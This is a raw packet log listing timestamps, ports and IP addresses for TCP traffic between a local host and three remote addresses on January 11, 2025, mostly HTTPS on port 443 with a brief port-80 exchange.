Jan 11, 2025 06:31:35.231185913 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.231240034 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.232817888 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.232882977 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.236025095 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.236079931 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.237566948 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.237622023 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.237639904 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.237689018 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.242476940 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.242531061 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.242554903 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.242600918 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.249881029 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.249953032 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.249982119 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.250030041 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.251521111 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.251584053 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.251612902 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.251650095 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.256268978 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.256321907 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.256347895 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.256390095 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.260461092 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.260516882 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.260543108 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.260584116 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.264638901 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.264688969 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.264699936 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.264724016 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.264735937 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.264767885 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.268827915 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.268893957 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.268903017 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.268965006 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.272914886 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.272990942 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.273019075 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.273061991 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.276562929 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.276619911 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.276644945 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.276686907 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.280291080 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.280597925 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.280621052 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.280668974 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.284001112 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.284080029 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.284104109 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.284142971 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.287662983 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.287816048 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.287839890 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.287889957 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.291110992 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.291160107 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.291192055 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.291234970 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.294822931 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.294883966 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.294909954 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.294954062 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.297084093 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.297132969 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.297169924 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.297219992 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.299220085 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.299279928 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.299304008 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.299359083 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.301316977 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.301376104 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.301410913 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.301455975 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.303595066 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.303677082 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.303698063 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.303747892 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.305958033 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.306027889 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.306051970 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.306215048 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.307887077 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.307950020 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.307965994 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.308017015 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.310023069 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.310090065 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.310116053 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.310167074 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.312170982 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.312226057 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.312252998 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.312314987 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.314363956 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.314438105 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.314464092 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.314515114 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.316508055 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.316571951 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.316612005 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.316662073 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.318646908 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.318707943 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.318841934 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.318892956 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.320889950 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.320957899 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.320976973 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.321026087 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.322971106 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.323033094 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.323106050 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.323158026 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.325192928 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.325256109 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.325270891 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.325319052 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.327282906 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.327346087 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.327405930 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.327460051 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.329386950 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.329446077 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.329459906 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.329507113 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.331686020 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.331747055 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.331823111 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.331872940 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.333511114 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.333570004 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.333585978 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.333636999 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.335624933 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.335685968 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.335711002 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.335762978 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.337558031 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.337620020 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.337737083 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.337785959 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.339612007 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.339687109 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.339709044 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.339762926 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.341658115 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.341722965 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.341768026 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.341823101 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.343671083 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.343733072 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.344997883 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.345057011 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.345830917 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.345890045 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.345917940 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.345974922 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.347906113 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.347969055 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.348829985 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.348887920 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.349652052 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.349709034 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.349728107 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.349781990 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.351665974 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.351743937 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.353060007 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.353122950 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.353140116 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.353190899 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.353822947 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.353873968 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.353955984 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.354001999 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.355535030 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.355591059 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.357234001 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.357300043 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.357352972 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.357392073 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.357402086 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.357450008 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.359338045 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.359397888 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.361346006 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.361406088 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.361408949 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.361423969 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.361463070 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.363188982 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.363256931 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.364968061 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.365032911 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.365097046 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.365139961 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.365148067 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.365200996 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.366795063 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.366851091 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.368616104 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.368671894 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.368710995 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.368752956 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.368758917 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.368808985 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.370815992 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.370882988 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.372277021 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.372334003 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.372383118 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.372428894 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.372436047 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.372486115 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.373882055 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.373925924 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.375914097 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.375972033 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.376082897 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.376128912 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.376141071 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.376185894 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.377547979 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.377605915 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.379400969 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.379486084 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.379492998 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.379544020 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.379549980 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.379594088 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.381134033 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.381212950 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.383109093 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.383172035 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.383467913 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.383527994 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.383553028 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.383603096 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.385632038 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.385687113 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.385723114 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.385775089 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.386379004 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.386431932 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.386470079 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.386523962 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.387854099 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.387918949 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.387933016 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.388051987 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.389445066 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.389514923 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.389529943 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.389583111 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.390937090 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.391002893 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.391026974 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.391077995 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.392326117 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.392389059 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.392453909 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.392503977 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.394180059 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.394237041 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.394275904 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.394324064 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.394352913 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.394407988 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.395988941 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.396055937 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.396083117 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.396133900 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.400634050 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.400703907 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.400717974 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.400763988 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.400794029 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.400834084 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.400964022 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.401011944 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.401209116 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.401268959 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.401292086 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.401340961 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.402853966 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.402918100 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.402935982 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.402987003 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.403013945 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.403064966 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.403168917 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.403218031 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.407223940 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.407291889 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.407373905 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.407422066 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.407449961 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.407470942 CET	443	49977	142.250.185.129	192.168.2.7
Jan 11, 2025 06:31:35.407527924 CET	49977	443	192.168.2.7	142.250.185.129
Jan 11, 2025 06:31:35.669852972 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:35.674707890 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:35.674854040 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:35.675009012 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:35.679879904 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:36.259078979 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:36.262938023 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:36.267919064 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:36.422199011 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:36.462774038 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:36.758971930 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:36.759021044 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:36.759116888 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:36.760674953 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:36.760687113 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.227364063 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.227509975 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.231513977 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.231535912 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.232048988 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.235694885 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.279351950 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.371541977 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.371632099 CET	443	49979	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.371828079 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.376981020 CET	49979	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.384372950 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:37.389378071 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:37.543570042 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:37.545799971 CET	49980	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.545861959 CET	443	49980	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:37.545932055 CET	49980	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.546320915 CET	49980	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:37.546341896 CET	443	49980	104.21.112.1	192.168.2.7
